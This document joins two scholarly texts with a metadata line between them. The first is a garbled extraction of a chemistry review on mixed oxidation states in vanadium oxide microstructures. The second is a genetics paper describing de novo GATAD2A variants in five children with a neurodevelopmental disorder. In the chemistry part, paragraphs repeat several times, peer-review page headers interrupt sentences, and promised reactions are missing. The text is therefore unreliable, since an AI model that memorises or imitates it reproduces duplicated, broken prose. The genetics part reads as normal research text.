The micro-square morphology with the same lattice, (NH 4 ) 2 V 7 O 16 , has been synthesized with different reducing agents. For example, Ma et al. [73,74] used the same V 5+ precursor (NH 4 VO 3 ) without long or short alkyl chain primary monoamines/diamines but using formic acid HCOOH as the reducing agent in water instead. The mixture was hydrothermally aligned at 250 • C for 12 h; the reaction created micrometric square bricks. The first stage of the synthesis is very similar to the VOx-MSQ previously reviewed; the structural lattice was unknown and first described as novel-(NH 4 ) 2 V 2 O 5 . In the synthesis, NH 4 VO 3 generates vanadates under various hydrolysis and condensation reactions; this is described in abbreviated form below, summarizing the possible processes that could be involved throughout the synthesis.
10 (38) Decavanadate generates V 2 O 5 under precipitation at a low pH, which results in a reduction at a high temperature through the hydrothermal treatment, yielding the structural (NH 4 ) 2 V 7 O 16 lattice with the micro-brick morphology; the redox reaction is listed below: Considering the NH 4 + polycations in aqueous media, Some other reactions that could have taken place are listed below: The V 4+ /V 5+ ratio is 0.667, approximately, yielding a 40.0% V 4+ content and a 60.0% V 5+ content. The weighted oxidation state is 4.60 (V 4.60+ ), the smallest reduction degree in (NH 4 ) 2 V 7 O 16 found in the literature. The structural lattice was resolved in their second work and resembles the same triclinic unit cell, framework, and red parameters previously described by Roppolo et al. [71] from the (EnH 2 ) 2 V 7 O 16 microstructures.
Heo. et al. [75] reported the same micro-square (NH 4 ) 2 V 7 O 16 morphology via a hydrothermal treatment at 250 • C for a period of time of 15 h, using the NH 4 VO 3 (V 5+ precursor) and LiBH 4 reducing agent in a tetrahydrofuran/water medium. Ammonium metavanadate in water exists in infinite tetrahedra chains; adjusting the pH will produce VO 4 3− polyanion, which, in turn, is the main polyhedron in the equilibrium. Some previous 4 15 studies have demonstrated that LiAlBH 4 reduces VO 4 3− polyoxoanions into VO 2; therefore, a redox reaction could be associated with this transformation, considering the borohydride hydrolysis listed below: The (NH 4 ) 2 V 7 O 16 structural lattice could have been formed through many factors under the hydrothermal treatment; for example, with incomplete stoichiometry (adding minor quantities of LiAlBH 4 ), VO 4 3− will be partially reduced. Therefore, the formation of (NH 4 ) 2 V 7 O 16 could be the main consequence, allowing the NH 4 + intercalation inside the oxide layers; a reaction is exemplified below: The V 4+ /V 5+ ratio is 2.45, approximately yielding a 71.0% V 4+ content and a 29.0% V 5+ content; the weighted oxidation state is 4.29 (V 4.29+ ), similar to the BaV 7 O 16 •nH 2 O found in the literature. The structure features a triclinic unit cell with red parameters: a = 6.1480 Å, b = 6.1434 Å, and c = 18.0309 Å, with α = 95.621 • , β = 93.018 • , and γ = 89.971 • , It display the same framework and structural features previously mentioned by Wang et al. [65].
The previous method was optimized by Ma et al. [76] using the same V 5+ precursor (NH 4 VO 3 ) dispersed in water, and reduced with LiBH 4 in tetrahydrofuran for 10 min. The black powder was transferred into a Teflon-lined autoclave and was hydrothermally treated for 10 h at 180 • C under low-speed rotation at 15 rpm; the (NH 4 ) 2 V 7 O 16 microstructures display a hierarchical structure made of self-assembled nanoflakes resembling some sort of spheres. The V 4+ /V 5+ ratio is not informed, suggesting it has the same ratio informed in the previous method; the structural lattice framework and red parameters are equally related to (NH 4 ) 2 V 7 O 16 ammonium vanadium bronze, reported by Heo et al. [75].
Vanadium Oxide V 6 O 11 Rotationally Symetric Nano Six-folds (VOx-NC) and Nano Star Fruits (VOx-NSF)
Vanadium oxide rotationally symmetric nano six-folds, featuring a star fruit or cog morphology (VOx-NC), were reported by O'Dwyer et al. [66]. The sol-gel synthesis employs vanadium oxide xerogel and long alkyl chain thiols; the layered vanadium oxide xerogel structure involves a reaction with a V 2 O 5 precursor, refluxed in tert-butanol for eight hours at 100 • C, approximately; the vanadium (V) tritertbutoxide is created, and the reaction is listed below: The VO(OC(CH 3 ) 3 ) 3 precursor reacts with water, generating the xerogel vanadium oxide (V 2 O 5 •nH 2 O)-layered compound, which becomes stable after rearrangement during an aging process of seven days. The xerogel structure is based on a sol-gel process, which is exhibited below: Hydrolysis Reactions 2023, 4, FOR PEER REVIEW 16 Hydrolysis
Condensation
Hydrolysis Condensation It has been reported that xerogel encounters a small reduction process with water during the aging process; a simple reaction can exemplify this change: There are some differences in the intercalation of the long alkyl chain thiols inside the vanadium oxide xerogel layers, when the reaction is performed at 40 °C instead. The organic functional group thiol, CH3-(CH2)11-SH (1-dodecanethiol (DDT)), is not able to interact with the host lattice under the hydrogen bonds, and the vanadium oxide content in xerogel is very low in comparison with other vanadium (V) oxide precursors; these factors might accelerate the reduction process during the early stage of the synthesis; therefore, the reaction could be represented below: The temperature accelerates the reduction process, under vigorous stirring, and is associated with the self-assembled intercalated thiols. The interactions between the de vanadyl bonds from the host lattice are not strong enough, and are partially driven by the dipole-dipole interactions and London forces, which still allowed the intercalation compound formation, but failed to control the reduction path; therefore, the reduction degree is stronger; the reducing agent (thiols) might oxidate into disulphurs through the reaction; and the oxidant agent V2O5 reduces halfway into V 4+ . The hydrothermal treatment over seven days at 180 °C increases the reduction process to an extensive degree; the structure changes from V2O5/V2O4 into a crystalline V6O11 lattice; the intermolecular forces are overcome; the thiol´s oxidation into disulphurs allows the (48) Hydrolysis Condensation It has been reported that xerogel encounters a small reduction process with water during the aging process; a simple reaction can exemplify this change: There are some differences in the intercalation of the long alkyl chain thiols inside the vanadium oxide xerogel layers, when the reaction is performed at 40 °C instead. The organic functional group thiol, CH3-(CH2)11-SH (1-dodecanethiol (DDT)), is not able to interact with the host lattice under the hydrogen bonds, and the vanadium oxide content in xerogel is very low in comparison with other vanadium (V) oxide precursors; these factors might accelerate the reduction process during the early stage of the synthesis; therefore, the reaction could be represented below: The temperature accelerates the reduction process, under vigorous stirring, and is associated with the self-assembled intercalated thiols. The interactions between the de vanadyl bonds from the host lattice are not strong enough, and are partially driven by the dipole-dipole interactions and London forces, which still allowed the intercalation compound formation, but failed to control the reduction path; therefore, the reduction degree is stronger; the reducing agent (thiols) might oxidate into disulphurs through the reaction; and the oxidant agent V2O5 reduces halfway into V 4+ . The hydrothermal treatment over seven days at 180 °C increases the reduction process to an extensive degree; the structure changes from V2O5/V2O4 into a crystalline V6O11 lattice; the intermolecular forces are overcome; the thiol´s oxidation into disulphurs allows the (49) It has been reported that xerogel encounters a small reduction process with water during the aging process; a simple reaction can exemplify this change: There are some differences in the intercalation of the long alkyl chain thiols inside the vanadium oxide xerogel layers, when the reaction is performed at 40 • C instead. The organic functional group thiol, CH 3 -(CH 2 ) 11 -SH (1-dodecanethiol (DDT)), is not able to interact with the host lattice under the hydrogen bonds, and the vanadium oxide content in xerogel is very low in comparison with other vanadium (V) oxide precursors; these factors might accelerate the reduction process during the early stage of the synthesis; therefore, the reaction could be represented below: The temperature accelerates the reduction process, under vigorous stirring, and is associated with the self-assembled intercalated thiols. The interactions between the de vanadyl bonds from the host lattice are not strong enough, and are partially driven by the dipole-dipole interactions and London forces, which still allowed the intercalation compound formation, but failed to control the reduction path; therefore, the reduction degree is stronger; the reducing agent (thiols) might oxidate into disulphurs through the reaction; and the oxidant agent V 2 O 5 reduces halfway into V 4+ . The hydrothermal treatment over seven days at 180 • C increases the reduction process to an extensive degree; the structure changes from V 2 O 5 /V 2 O 4 into a crystalline V 6 O 11 lattice; the intermolecular forces are overcome; the thiol s oxidation into disulphurs allows the complete disintercalation process; the structure reduces the oxidation state into V 3+ /V 4+ mixture generating the star shape morphology. Two possible reactions can be seen below (considering the 180 • C temperature all-intercalated water had been removed from the xerogel). The SEM and TEM micrographs to appreciate the star morphology and the evidence of disintercalation signs (also confirmed by XRD analysis) are displayed in Figures 8 and 9. More detailed scanning micrographs can be seen in the supporting information Figure S4. mixture generating the star shape morphology. Two possible reactions can be seen below (considering the 180 °C temperature all-intercalated water had been removed from the xerogel). The SEM and TEM micrographs to appreciate the star morphology and the evidence of disintercalation signs (also confirmed by XRD analysis) are displayed in Figures 8 and 9. More detailed scanning micrographs can be seen in the supporting information Figure S4. The method to produce a similar structure with another structural lattice was reported by Shao et al. [67] The synthesis employed the vanadium oxide precursor NH4VO3 in the presence of Pluronic 123; the pH was controlled with formic acid (HCOOH); the mixture was hydrothermally aligned for 48 h at 180 °C; the hexangular Reactions 2023, 4, FOR PEER REVIEW 17 mixture generating the star shape morphology. Two possible reactions can be seen below (considering the 180 °C temperature all-intercalated water had been removed from the xerogel). The SEM and TEM micrographs to appreciate the star morphology and the evidence of disintercalation signs (also confirmed by XRD analysis) are displayed in Figures 8 and 9. More detailed scanning micrographs can be seen in the supporting information Figure S4. The method to produce a similar structure with another structural lattice was reported by Shao et al. [67] The synthesis employed the vanadium oxide precursor NH4VO3 in the presence of Pluronic 123; the pH was controlled with formic acid (HCOOH); the mixture was hydrothermally aligned for 48 h at 180 °C; the hexangular The method to produce a similar structure with another structural lattice was reported by Shao et al. [67] The synthesis employed the vanadium oxide precursor NH 4 VO 3 in the presence of Pluronic 123; the pH was controlled with formic acid (HCOOH); the mixture was hydrothermally aligned for 48 h at 180 • C; the hexangular star-fruit vanadium oxide obtained exhibits a VO 2 structural lattice, confirming a full reduction from V 5+ to V 4+ . The first stage of the synthesis implies the transition from metavanadate into vanadium pentoxide at a lower pH under a sol-gel process; no evidence of an intercalation process is reported; therefore, at room temperature, the reduction process is minimal. The reaction belows exhibits an abreviated reaction.
First stage: Sol-gel The second stage responds to the hydrothermal treatment, aided by two reducing agents, formic acid and Pluronic 123, and without the formation of an intercalation compound at the previous stage. Therefore, the oxidant agent reduction rate is faster at the same temperature used in the vanadium oxide VOx-MSQ previously described. The ammoniun polycation (NH 4 + ) was not reported to be intercalated inside the vanadium dioxide in the final star-fruit structure, this suggests the ammonium stays as the HCOONH 4 + salt during the hydrothermal treatment; the reaction can be seen below.
Hydrothermal treatment During the reduction, some nanosheets and nanofibers are made; therefore, the second role of the Pluronic 123 is to assist the self-assembly process of these nanostructures to build the final hexangular star-fruit structure.
Mixed Oxidation States Rate Control
Researchers have tried to change or vary the V 5+ /V 4+ rate, in order to modify their electronic properties [77], without altering the structure morphology, and many applications and new properties have been enhanced and obtained. The most common techniques are functionalization processes on intercalated organic-inorganic hybrids, such as nanotubes or nanourchins. Some organic self-assembled amphiphilic molecules, foreign species such as cations, anions, and other surfactants, are reversibly inserted into the vanadium oxides sheets, regulating the oxidation state rate. Other techniques are doping processes such as adding or removing electrons, using reducing or oxidant agents, shifting the oxidation states rate; the synthesis can be modified in the beginning by adding small quantities of different metal cations to be part of the structure; the structure's morphology stays invariable but it s electronic properties are adjusted; the atomic layer deposition (ALD) is used to achieve desirable electronic properties, as well; different atoms, cations, or anions are infiltrated in specific locations over the vanadium oxide microstructure without altering the structure's morphology. For example, V. Lavayen et al. [78] inserted gold nanoparticles (Au-NPs), stabilized with long alkyl thiols (1-dodecanethiol (DDT)), into vanadium oxide nanotubes (VOx-NTs) intercalated with 1-dodecylamine (DDA). The DDT: DDA of 4:1 (thiol:amine relationship) was refluxed with ethanol; Au-NPs were added in acetone under constant stirring; some amount of intercalated self-assembled DDA was replaced with self-assembled (Au-NPs)-DDT. TEM and electron diffraction were used to determine the two phases on the vanadium oxide nanowalls-one responding to the VOx-NTs/thiols and the other to the VOx-NT/Au-NPs inserted into the interlaminar spaces. The infrared FT spectroscopy features a vibration band at 962 cm −1 , suggesting slightest quantities of V 4+ associated with a V 4+ /V 5+ rate modification; the replacement involves a decrease in intermolecular forces, mainly hydrogen bonds and ion-dipole interactions; the host lattice V 7 O 16 2− experiences an oxidation process, shrinking the V 4+ /V 5+ ratio. Saleta et al. [79] studied the Ni 2+ influence on multiwall VOx-NTs; the self-assembled intercalated 1-hexadecylamine is exchanged with Ni 2+ cations in ethanol/water solvents without altering the tubular morphology; the magnetization characterizations exhibit a major decrease in V 4+ content from a~50.0 to 16.0% (weighted oxidation state V 4.5+ to V 4.88+ ); the effect was related to the disintercalated 1-hexadecylamine replaced by Ni 2+ inside the V 7 O 16 2− tubular layers, decreasing the interlayer distances and intermolecular forces. The next reaction exhibits the interexchange reaction: 3 VOx-NTs (46.9% V 4+ and 53.1% V 5+ ) content featuring an average oxidation state of V 4.531+ . A set of reactions exhibits these processes, assuming the first step is a simple interexchange reaction, and the second step is associated to a redox process: Saliman et al. [81] obtained Zr-doped VOx-NTs, employing the V 2 O 5 precursor with 1-dodecylamine (C 12 H 25 NH 2 ) and adding a slight amount of ZrO 2; all the reagents were mixed in water until a gel was formed. The (C 12 H 25 NH 3 ) 2 V 6,86 Zr 0,02 O 16 nanotubes containing 2.0% Zr 4+ dopant were obtained under hydrothermal treatment over four days at 180 • C. The interlayer distances shifted from 2.65 nm to 2.70 nm; the increase corresponds to the V 5+ replacement with Zr 4+ , which features a larger ionic radius (0.80 Å) than V 5+ (0.50 Å); therefore, the V 5+ content decreased, and the V 4+ /V 5+ ratio should have increased, as well; the tubular morphology has remained without collapsing the structure.
The charged electron and hole-doping functionalization has also been successfully performed by Krusin-Elbaum et al. [82]. The electron functionalization was performed on (C 12 H 25 NH 3 ) 2 V 7 O 16 nanotubes; the butyl lithium solution employed contains the necessary amount of lithium to compensate each V 5+ cation to reduce it into V 4+ ; the V 4+ /V 5+ ratio increases considerably and ferromagnetic behavior is observed at room temperature. A simple reaction can exemplify the process, assuming some intercalated water belongs from the VOx-NTs.
This method was performed under the same fashion, but the lithium ions are intercalated through an interexchange reaction with the self-assembled long alkyl chains primary monoamines, the intercalated lithium ions stabilize the V 4+ /V 5+ ratio, decreasing the V 4+ content, and high temperature ferromagnetism arises from the Li-VO x NTs with specific amounts of intercalated lithium ions [83]. The other charge doping functionalization performed by Krusin-Elbaum was hole-doping, employing certain amounts of sublimated iodine for different periods of time to extract electrons from the V 4+ (V (3) centers); the production of holes eradicates the spin frustration from the VOx-NTs system; the V 4+ /V 5+ ratio decreases and room temperature ferromagnetism arises, as well. A simple reaction can explain the redox process, assuming there is some intercalated water inside the VOx-NTs.
Saleta et al. [84] conducted research on VOx-NTs aging time; it was found that the vanadyl bond V 4+ = O oxidizes to V 5+ = O, changing drastically the V 4+ /V 5+ ratio; therefore, the magnetic properties suffer forceful changes; the variation throughout the aging time suggests that oxidation might be the key factor in all the different V 4+ content values reported in the literature. These were obtained employing different quantification methods; the aging process studied over 65 months at environmental conditions (room temperature and pressure) exhibits the oxidation from 70.0% to 12.0% V 4+ content using the XANES technique; the oxidation changes the V 4+ /V 5+ ratio from 2.33 to 0.136; therefore, the weighted oxidation state in each case is V 4.30+ in brand-new V 4.88+ in aged VOx-NTs; even though the increased oxidation of 58.0% is radical, the tubular morphology remains intact; the reaction can be seen below.
Morphologic Defects
Structural morphologic defects might be involved in some redox processes of vanadium oxide microstructures. The reduction could increase or decrease, depending on the type of defect. For example, defect-rich VOx-NTs [69] have smaller amounts of V 4+ content than regular VOx-NTs, and the different magnetic properties are related to these defects. The effect is accomplished when the amount of surfactant (reducing agent) is decreased; the mol stoichiometry used to achieve the effect is 2:1. (V 2 O 5 -C 18 H 37 NH 2 (1-octadecylamine)); defect-rich (C 18 The next set of micrographs in Figure 10 exhibits some structural morphologic defects in (NH 4 ) 2 V 7 O 16 MSQ, with the eroded borders displaying a high degree of porosity, and (C 18 H 35 NH 3 ) 2 V 7 O 16 NU displaying a surface crack that was obtained through the hydrothermal treatment, which might also change the V 4+ /V 5+ ratio. Other SEM and TEM micrographs from defect VOx-microstructures are featured in the supporting information in Figures S5 and S6.
Reactions 2023, 4, FOR PEER REVIEW 20 suggests that oxidation might be the key factor in all the different V 4+ content values reported in the literature. These were obtained employing different quantification methods; the aging process studied over 65 months at environmental conditions (room temperature and pressure) exhibits the oxidation from 70.0% to 12.0% V 4+ content using the XANES technique; the oxidation changes the V 4+ /V 5+ ratio from 2.33 to 0.136; therefore, the weighted oxidation state in each case is V 4.30+ in brand-new V 4.88+ in aged VOx-NTs; even though the increased oxidation of 58.0% is radical, the tubular morphology remains intact; the reaction can be seen below.
Morphologic Defects
Structural morphologic defects might be involved in some redox processes of vanadium oxide microstructures. The reduction could increase or decrease, depending on the type of defect. For example, defect-rich VOx-NTs [69] have smaller amounts of V 4+ content than regular VOx-NTs, and the different magnetic properties are related to these defects. The effect is accomplished when the amount of surfactant (reducing agent) is decreased; the mol stoichiometry used to achieve the effect is 2:1. (V2O5-C18H37NH2 (1-octadecylamine)); defect-rich (C18H37NH3)2V7O16 VOx-NTs exhibits a 1/3 V 4+ /V 5+ ratio, resulting in a V 4,75+ weighted oxidation state, featuring 25.0% V 4+ and 75.0% V 5+ content, respectively, in comparison to conventional (C18H37NH3)2V7O16 VOx-NTs with a 1/2 V 4+ /V 5+ ratio, which corresponds to 33.45% V 4+ and 66.55% V 5+ content. The weighted oxidation state in defectrich VOx-NTs is V 4.666+ , and the defects are oxygen vacancies; the formation of O-V 5+ -OH hydroxyl groups with 60.0% content causes the V (3) tetrahedral V 4+ site to face oxidation in the V7O16 2− structural lattice. The vanadyl bond, V 4+ = O, transitions to V 5+ -OH in the defect-rich VOx-NTs in comparison with the 30.0% hydroxyl groups exhibited in the 1/2 ratio V 4+ /V 5+ VOx-NTs regular sample. The reaction below explains the possible oxidation: The next set of micrographs in Figure 10 exhibits some structural morphologic defects in (NH4)2V7O16 MSQ, with the eroded borders displaying a high degree of porosity, and (C18H35NH3)2V7O16 NU displaying a surface crack that was obtained through the hydrothermal treatment, which might also change the V 4+ /V 5+ ratio. Other SEM and TEM micrographs from defect VOx-microstructures are featured in the supporting information in Figures S5 and S6.
Conclusions
Vanadium oxide microstructures with mixed oxidation states are frequently obtained under sol-gel processes enhanced with hydrothermal treatment. Intercalation processes using functional groups such as long alkyl chain primary monoamines or ammonium cations regulate the vanadium oxidation states in different proportions. For urchins and nanotubes containing self-assembled long alkyl chain primary amines, the V 4+ /V 5+ ratio is around 0.85 (46.0% V 4+ and 54.0% V 5+ ); for a layered square morphology intercalated with ammonium cations, the V 4+ /V 5+ rate is around 2.70 (73.0% V 4+ and 27.0% V 5+ ); in other vanadium oxide microstructures where no intercalation compounds are obtained during hydrothermal treatment, such as symmetric rotationally six-folds and hexangular star-fruits, the reductions go even further; in the case of six-folds, a mixed oxidation states rate V 3+ /V 4+ is generated, and, for star-fruits and micrometric crosses, a solely oxidation state V 4+ is developed.
Intermolecular forces are fundamental to the intercalation processes and perhaps control the oxidation states rate, such as dipole-dipole and ion-dipole; nevertheless, stronger intermolecular forces such as hydrogen bonds display a major role for urchins, squares, and nanotubes, where multiple interactions occur inside the vanadium oxide layers during the sol-gel process. The V 5+ oxidation state remains constant throughout the hydrothermal treatment; the London forces between the self-assembled long alkyl chains. The ion-dipole and cooperative hydrogen bond interactions between the primary monoamines functional groups with the vanadyl bonds of the host V 7 O 16 2− structural lattice are enough to maintain the V 4+ /V 5+ ratio at 1.0 in the nanotubes and urchins. In the square morphology, cooperative hydrogen bonds between the ammonium cation with the vanadyl bonds from the V 7 O 16 2− host lattice increases the V 4+ /V 5+ ratio to 2.70. An analogous effect arises with intercalated protonated ethylene diamines, in addition displaying the same behavior with the vanadyl bonds from the V 7 O 16 2host lattice, if the synthesis pH is performed at pH lower than 6. The three vanadium oxide microstructures will produce mixed oxidation states.
If the intercalation processes do not prevail during the hydrothermal treatment, or were not developed during the first stage of the synthesis, the reduction processes are straightforward, depending on factors such as: the functional group of the surfactant, vanadium oxide (V 2 O 5 ) precursor concentration, temperature, and reaction time used previously in the sol-gel processes, and, during the hydrothermal treatment, a complete reduction from V 5+ to V 4+ emerge in structures such as hexangular star-fruits, vanadium oxide crosses (VO 2 or V 2 O 4 ). The reduction degree is even higher in rotationally symmetric six-folds (V 6 O 11 ), which exhibit a V 3+ /V 4+ ratio.
Vanadium oxide chemistry exhibits multivariant equilibria involving most of the ionic equilibriums such as acid-base, coordination, solubility, and redox, associated with different structural lattices.
Author Contributions: Conceptualization, methodology, resources, writing-original draft preparation, writing-review and editing, visualization, supervision, funding acquisition, D.N. All authors have read and agreed to the published version of the manuscript. | 2022-12-31T16:13:17.222Z | 2022-12-28T00:00:00.000 | {
"year": 2022,
"sha1": "5fea306e1b7ce37c2b05ae7a6d9540ca56713031",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2624-781X/4/1/1/pdf?version=1672227417",
"oa_status": "GOLD",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "2030e6f0dccc821fc415940c388fbcc8d8a796e1",
"s2fieldsofstudy": [
"Chemistry"
],
"extfieldsofstudy": []
} |
258274376 | pes2o/s2orc | v3-fos-license | De novo variants in GATAD2A in individuals with a neurodevelopmental disorder: GATAD2A-related neurodevelopmental disorder
Summary GATA zinc finger domain containing 2A (GATAD2A) is a subunit of the nucleosome remodeling and deacetylase (NuRD) complex. NuRD is known to regulate gene expression during neural development and other processes. The NuRD complex modulates chromatin status through histone deacetylation and ATP-dependent chromatin remodeling activities. Several neurodevelopmental disorders (NDDs) have been previously linked to variants in other components of NuRD’s chromatin remodeling subcomplex (NuRDopathies). We identified five individuals with features of an NDD that possessed de novo autosomal dominant variants in GATAD2A. Core features in affected individuals include global developmental delay, structural brain defects, and craniofacial dysmorphology. These GATAD2A variants are predicted to affect protein dosage and/or interactions with other NuRD chromatin remodeling subunits. We provide evidence that a GATAD2A missense variant disrupts interactions of GATAD2A with CHD3, CHD4, and CHD5. Our findings expand the list of NuRDopathies and provide evidence that GATAD2A variants are the genetic basis of a previously uncharacterized developmental disorder.
Introduction
Chromatin modifiers and remodelers have been recently implicated in a variety of neurodevelopmental disorders (NDDs). [1][2][3][4][5][6][7][8] The nucleosome remodeling and deacetylase (NuRD) complex has been linked to four NDDs with overlapping phenotypes as a result of dominant variants in several paralogous subunits of the complex (NuRDopathies). [5][6][7][8][9] NuRD regulates a variety of cellular processes including cell-cycle progression, genome integrity, and cellular differentiation. [10][11][12] The NuRD complex consists of several different subunits, each with a set of paralogous proteins. 9 The holoenzyme complex can be divided into two subcomplexes: the chromatin remodeling subcomplex (CRS) and a histone deacetylation (HDAC) subcomplex, or HDAC core ( Figure 1A). The HDAC core consists of three subunits in multiple copies comprised of different paralogs that include four retinoblastoma-binding protein (RBBP4/7) subunits, two metastasis-associated protein (MTA1/2/3) subunits, and two histone deacetylase (HDAC1/2) subunits. 10,12 By contrast, the CRS is composed of three monomeric paralogous subunits in series: a methyl-binding domain protein (MBD2/3), a GATAD2 protein (GATAD2A/B, previously known as p66a/b), and a chromodomain helicase DNAbinding protein (CHD3/4/5). A CDK2AP1 protein serves as the final member of the CRS and interacts with GATAD2 and CHD paralogs (not shown in diagram). 10,12 Notably, the various paralogs enable a wide variety of NuRD subtypes, each with the potential to provide unique functions. For example, CHD3-, CHD4-, and CHD5-possessing NuRD subtypes (CHD3-NuRD, CHD4-NuRD, etc.) are differentially expressed during corticogenesis. CHD4-NuRD subtypes activate expression of a specific set of genes in neural progenitor cells, which are subsequently repressed in cortical neurons by CHD3-NuRD. 13,14 Interestingly, CHD3, CHD4, and CHD5 are all associated with dominant NDDs with overlapping phenotypes (CHD3-related syndrome [CHD3RS/Snijders-Blok-Campeau syndrome; Figure 1A). [6][7][8]15 Of note, dominant variants in GATAD2B, which tethers the CHD paralogs to the rest of the complex in GATAD2B-NuRD (2B-NuRD) subtypes, have been associated with GATAD2B-associated neurodevelopmental disorder (GAND) (MIM: 615074), a NuRDopathy whose phenotypes encompass nearly all features of CHD3RS, CHD4RS, and CHD5RS combined ( Figure 1A). 16 To date, GATAD2A has not been associated with a NuRD-related NDD; however, GATAD2A deficiency has been linked to increased expression of fetal hemoglobin with a nonsense GATAD2A variant (c.19C>T, p.R7*), 17,18 and regulatory variants in GATAD2A are significantly associated with schizophrenia and bipolar disorder. 19,20 The degree to which GATAD2A-NuRD (2A-NuRD) and 2B-NuRD subtypes functionally overlap or diverge is unclear, although some research has suggested non-redundant functions in certain cell types. 10,17,21,22 GATAD2A possesses proline-rich PPPL4 motifs (absent in GATAD2B) that allow for interaction with MYND domains in proteins like ZMYND8. 21 GATAD2A also seems to have a nonredundant role in early stem cell differentiation and its ablation enhances pluripotent reprogramming. 22 Interestingly, GATAD2A is highly expressed during early neural development, 23 which is consistent with early embryonic lethality and variable developmental defects in Gatad2a knockout mice. 24 We report the identification of five novel de novo heterozygous variants in GATAD2A in five unrelated individuals with NDD phenotypes. Despite variable expressivity of phenotypes, shared clinical features in affected individuals include global developmental delay (GDD), structural brain defects, and craniofacial anomalies. Observed clinical phenotypes overlap with other NuRDopathies, suggesting that NuRD paralog deficiencies may converge on similar mechanisms during development. We also demonstrate that one missense variant (c.1259 G>A, p.C420Y) disrupts known interactions between GATAD2A and CHD paralogs. We hypothesize that these GATAD2A variants likely act through a loss-of-function (LoF) haploinsufficiency mechanism. Together, we provide evidence for a GATAD2A-related neurodevelopmental disorder that we have termed GARND ( Figure 1A).
Research subjects
All subjects and parents or guardians provided informed consent and were enrolled in institutional review board (IRB)-approved research studies. Consenting was performed in accordance with the ethical standards of the respective IRB committees on human research subjects and in keeping with international standards. Probands (P) 2-5 were identified through multiple nodes in the MatchMaker Exchange, including GeneMatcher and My-Gene2. 25,26 Participants were recruited at the following institu-
Variant calling and annotation
Variant calling of single-nucleotide variants (SNVs) and copy number variants was performed using GATK and CONIFER, respectively. The data were filtered and annotated using GEMINI v.0.19.1 Variant Effect Predictor (VEP). Variants were also filtered against public databases including the 1000 Genomes Project phase 311, Genome Aggregate Database (gnomAD), and NHLBI Exome Sequencing Project (ESP) 6500. Those with a minor allele frequency >0.005 were excluded. In addition, variants flagged as low impact, low quality, or putative false positives (Phred quality score <20) were excluded from the analysis. Variants in genes known to be associated with NDD were selected and prioritized based on predicted pathogenicity.
The de novo status of GATAD2A variants in P1, P3, and P5 was reported based on trio exome sequencing results, and by Sanger sequencing confirmation in participants P2 and P3 and respective parents ( Figure 1B). Pathogenicity of variants was assessed according to American College of Medical Genetics (ACMG) guidelines and using the Franklin Genoox online classification tool. All variants were submitted to Database: ClinVar (accession no. VCV001705818.2, VCV001705819.2, VCV001705820.2, VCV001705821.2, and VCV001705822.2).
Protein conservation, structure, and in silico analyses NCBI HomoloGene tool was used to obtain aligned amino acid sequences of GATAD2A across species at affected residues and flanking regions. Protein alignment was performed on GATAD2A and GATAD2B sequences using Geneious Prime v.2022.1.1 global alignment with free end gaps and a Blosum62 cost matrix. PDB files for GATAD2A (AF-Q86YP4) were downloaded and extracted from the AlphaFold Protein Structure Database's reference Homo sapiens proteome file no. UP000005640. The structure was edited in PyMOL v.2.5.2. In silico prediction of the functional impact of GATAD2A variants was performed using Polymorphism Phenotyping (PolyPhen-2) v.2.2.3r406 using the HumDiv model, Sorting Intolerant From Tolerant (SIFT), varSEAK, and Muta-tionTaster2021. [27][28][29] Combined annotation-dependent depletion (CADD) Phred scores were obtained for each variant using
Western blotting and co-immunoprecipitation
Immunoprecipitation assays were performed as previously described. 16 In brief, HA-GATAD2A WT and HA-GATAD2A C420Y proteins were independently co-expressed with each of the three FLAG-CHD-CTD fusion proteins in rabbit reticulocyte lysates for in vitro translation (IVT). Expressed FLAG-CHD-CTD proteins together with HA-GATAD2A proteins were immobilized on anti-FLAG resin, washed, and eluted with 3X-FLAG peptide. In parallel, IVT lysates expressing only an HA-GATAD2A or FLAG-CHD-CTD protein, as well as lysates with no expressed protein, were run as negative controls. Immunoprecipitation inputs and eluates were loaded and run with sodium dodecyl sulfate-polyacrylamide gel electrophoresis followed by transfer to a polyvinylidene fluoride membrane. Immunoblots were probed with anti-HA-HRP (1:20,000, Cell Signaling Technology, no.2999S) followed by probing with anti-FLAG-HRP (1:80,000, Sigma Aldrich, no. A8592).
Results
Individuals with heterozygous GATAD2A variants exhibit features of developmental disorders Through research exome-based sequencing, we identified a de novo variant of uncertain significance in the GATAD2A gene (NM_017660.5) in a child (P1; c.673C>T, p.R225*) who presented with multiple congenital anomalies at age 1 month (Figures 1B-1D). He was diagnosed with imperforate anus, moderate membranous ventricular septal defect, patent ductus arteriosus, right optic nerve coloboma, microphthalmia, and bilateral hydronephrosis. Craniofacial dysmorphisms include choanal atresia, prominent or broad forehead, deep-set eyes, and broad nasal root ( Figure 1C). He had GDD with a brain MRI at 4 days old that showed pyriform aperture stenosis, small optic nerves, bilateral cerebellar hematomas, parietooccipital hematoma, enlarged ventricles, and a thin corpus callosum ( Figure 1D).
Normal testing results from chromosomal microarray and a CHARGE syndrome sequencing panel necessitated exome sequencing. A de novo nonsense GATAD2A variant (c.673C>T, p.R225*) was identified by trio exome sequencing that is absent in control populations (gnomAD v.2.1.1), with in silico analysis supporting a deleterious ef-fect (Table 1). After identifying individual P1, we subsequently identified four additional unrelated individuals with novel de novo variants in GATAD2A through international variant-sharing efforts and have summarized their phenotypes below as well as in Table 1 ( Figure 1B).
Individual P2 was a 7-year-old male who presented with mild short stature, chronic otitis media and associated hearing loss, hypotonia, and borderline macrocephaly. He had feeding difficulties, mild GDD, and speech delay although he continued to make developmental progress. Echocardiogram identified mild atrial enlargement. Head ultrasound revealed mildly asymmetric ventricles. Craniofacial features include prominent forehead, deep-set eyes, midface hypoplasia, and a broad nasal root ( Figure 1C). Exome sequencing identified a de novo heterozygous missense GATAD2A variant (c.1259G>A, p.C420Y) in P2, with inheritance confirmed by subsequent trio Sanger sequencing.
Individual P3 was an 8-year-old female who presented with mild hemihyperplasia, horseshoe kidney, and bilateral Wilms tumor. She had normal development, and neuroimaging was not performed. Craniofacial dysmorphisms included hypertelorism, prognathism, and broad nasal tip. Trio exome sequencing identified a de novo heterozygous frameshift GATAD2A variant (c.1877delT, p.I627Tfs) in P3, which was confirmed by Sanger sequencing.
Individual P4 was a 4-year-old female who presented with right-sided hemihyperplasia. She had GDD, speech delay, and autistic features. Neuroimaging was not performed. No craniofacial dysmorphisms were noted. Exome sequencing identified a heterozygous GATAD2A missense variant (c.1205G>T, p.G402V) in P4 of unknown inheritance.
